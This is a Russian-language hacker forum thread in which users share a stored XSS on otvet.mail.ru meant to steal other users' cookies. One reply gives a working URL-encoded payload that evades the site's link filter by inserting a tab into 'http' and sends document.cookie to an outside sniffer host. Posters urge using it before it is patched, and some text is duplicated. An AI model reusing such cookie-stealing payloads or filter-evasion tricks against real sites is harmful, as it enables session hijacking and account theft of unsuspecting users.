Народ!!! Я нашёл XSS на otvet.mail.ru, но для её правильной работы ваша помошь нужна. Вот в чём вся суть, когда в вопрос (ответ) на этом сервисе вставляеш %3Cscript%3Ealert(%22XSS%22)%3C/script%3E то это работает, но как только я хочу спереть чужие плюшки, то мэил фильтрует ссылку на сайт на котором стоит снифак. И как только я её (ссылку) не мучал, и переводил в разные кодировки и делал свой снифе вставлял код в ответ <scriptsrc="http://www.naxodka.net/cookie.js"></script>. Всё равно фильтрует гад, вот результат фильтрации <script>location.href="<noindex><a target=_blank rel=nofollow href="http://ccl.whiteacid.org/log.php?182292">http://ccl.whiteacid.org/log.php?182292"...</a></noindex></script> . По моему эта тема интерестна всем, так давайте её раскрутим, а?!!! :)

Ура!=)
тоже сначала кодировал в разные кодировки результата 0.

достачно было поставить табуляцию между ht и tp

вот весь код:
%3Cscript%3Eimg %3D new Image%28%29%3B img.src %3D %22ht%09tp%3A%2F%2Fold.antichat.ru%2Fcgi-bin%2Fs.jpg%3F%22+document.cookie%3B%3C%2Fscript%3 E

страница с xss:
http://otvet.mail.ru/question/2334480/

юзаем пока не прикрыли=\

Ура!=)
тоже сначала кодировал в разные кодировки результата 0.

достачно было поставить табуляцию между ht и tp

вот весь код:
%3Cscript%3Eimg %3D new Image%28%29%3B img.src %3D %22ht%09tp%3A%2F%2Fold.antichat.ru%2Fcgi-bin%2Fs.jpg%3F%22+document.cookie%3B%3C%2Fscript%3 E

страница с xss:
http://otvet.mail.ru/question/2334480/

юзаем пока не прикрыли=\
Спасибо! Давно искал рабочию!

Всё лафа кончилась...прикрыли уязвимость, но кого это пугает??? Будем новые искать =).

быстро ж они прикрывают..
пользуяюсь случаем, хочу передать привет сотрудникам Mail.Ru! =)

быстро ж они прикрывают..
пользуяюсь случаем, хочу передать привет сотрудникам Mail.Ru! =)
ага, Андрюша, привет )

Rebz да тут им делать нечего, просто написали в открытую про активную ксску, ну и куча придурков сразу полезла ее непрекрыто вставлять везде где тока можно. Там уж админы не полные дураки. только на половину...